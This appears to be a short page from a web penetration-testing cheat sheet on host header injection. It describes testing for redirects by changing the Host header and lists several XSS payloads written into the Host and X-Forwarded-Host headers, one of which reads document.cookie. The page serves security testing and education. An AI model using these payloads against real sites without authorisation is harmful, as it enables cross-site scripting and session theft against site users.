Host Header Injection

- Simple Host Header Injection

Change Host parameter in request for www.bing.com, if it redirects to bing, then its vulnerable.

Try also setting localhost.

- Host Header Injection to XSS

Host: bing.com"></script><script>alert(1)</script><"

Host: <script>alert('foo');</script>.example.com

- X-Forwarded-Host Header Injection to XSS

X-Forwarded-Host: bing.com"><img src/onerror=prompt(document.cookie)>

PreviousCORSNextStructured objects - Specific functionalities

Last updated